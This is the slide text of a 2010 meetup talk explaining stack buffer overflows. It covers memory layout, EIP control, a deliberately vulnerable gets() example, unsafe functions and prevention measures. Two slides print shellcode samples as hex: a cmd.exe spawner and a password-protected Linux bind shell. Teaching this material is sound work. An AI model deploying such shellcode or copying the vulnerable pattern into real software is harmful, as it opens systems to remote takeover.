Buffer Overflow Demo by Saurabh Sharma @ null Banglore Meet, June, 2010

1. Buffer Overflows by: Saurabh Sharma

2. BUFFER

3. Buffer: The memory area where the user input is stored. Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas. Anatomy of Buffer Overflows

4. void get_input() { char buf[1024]; gets(buf); } void main(intargc, char*argv[]){ get_input(); } User controls the input. Malicious user can supply the input of more than 500 chars. So what ?? User can supply a malicious input which can execute some other exe. This can also be your cmd.exe and may lead to the system compromise. A small example

5. Text: Contains instructions Data: Contains initialized variables BSS: Contains uninitialized global and static variables(initialized to 0) Heap: Contains dynamic, uninitialized data(malloc()) Stack: Contains function arguments and local variables Memory overview

6. Stack Frame:holds variables and data for function Stack grows from higher memory location to lower memory location Heap: lower to higher Memory overview

7. General purpose: For basic calculations. ESI, EDI: Used mostly with arrays Flags: Outcome of several instructions set the flags Segment: Code, stack, data. EBP:Base pointer, points to the beginning of the current stack frame ESP: Stack pointer, points to the top of the stack EIP: Instruction pointer, points to the next instruction REGISTERS

8. Stack is a LIFO data structure. Temporary memory, formed when the function called. A new stack frame created when the function is called. The return address is saved just above the local variables. Stack Layout Lower address parameters Return addr(saved EIP) Saved EBP Stack grows Local variables Higher address

9. So, if the EIP can be controlled, the next instruction to be executed can be controlled. Stack Layout Lower address parameters Return addr(saved EIP) Saved EBP Stack grows Local variables Higher address

10. Machine code which is injected into the overflown buffer Does the work for you WORK: executing a third program, adding an administrator etc. SHELLCODE

11. win32/xp sp2 (En) cmd.exe 23 bytes Author : MountassifMoad A.K.A : "8bec68657865" "2068636d642e" "8d45f850b88D" "15867Cffd0"; EXAMPLE SHELLCODES(SMALL)

12. BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]= "31db5343536a0289e1b066cd80" "31d2526668bc0a666a0289e26a" "10526a0389e1fec3b066cd806a" "026a0389e1b304b066cd8031c9" "51516a0389e1fec3b066cd8031" "db536a3a685061737389e66a05" "566a0489e1b309b066cd8031c9" "31f6516a05526a0489e1b30ab0" "66cd8031c9516a72686861786f" "89e789d680c105fcf3a675bf31" "c9b304b03fcd804183f90375f6" "31c050682f2f7368682f62696e" "89e3505389e131d2b00bcd80b0" "01cd80" EXAMPLE SHELLCODES(bigger)

13. DEMO

14. strcpy() strcat() sprintf() scanf() sscanf() fscanf() vfscanf() vsprintf vscanf() vsscanf() streadd() strecpy() strtrns() MAJOR SNARES

15. Buffer size must be checked Use alternative functions e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src) Other protection mechanisms like /GS(stack cookie), ASLR, SafeSEH compilation PREVENTION

16. http://www.cccure.org/amazon/idssignature.pdf http://www.shell-storm.org/papers/files/539.pdf http://c0re.23.nu/~chris/data/bo-2004.pdf http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf REFERENCES

17. ????????????????? QUESTIONS